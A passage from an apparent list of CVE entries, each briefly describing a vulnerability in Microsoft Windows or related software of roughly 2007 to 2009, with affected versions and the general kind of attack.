SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5415] The LDBserver service in the server in CA ARCserve Backup 11.1 through 12.0 on Windows allows remote attackers to execute arbitrary code via a handle_t argument to an RPC endpoint in which the argument refers to an incompatible procedure. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2008-0639] Stack-based buffer overflow in the EnumPrinters function in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2, SP3, and SP4 for Windows allows remote attackers to execute arbitrary code via a crafted RPC request, aka Novell bug 353138, a different vulnerability than CVE-2006-5854. NOTE: this issue exists because of an incomplete fix for CVE-2007-6701. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6701] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP4 for Windows allow remote attackers to execute arbitrary code via long arguments to multiple unspecified RPC functions, aka Novell bug 287919, a different vulnerability than CVE-2007-2954. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 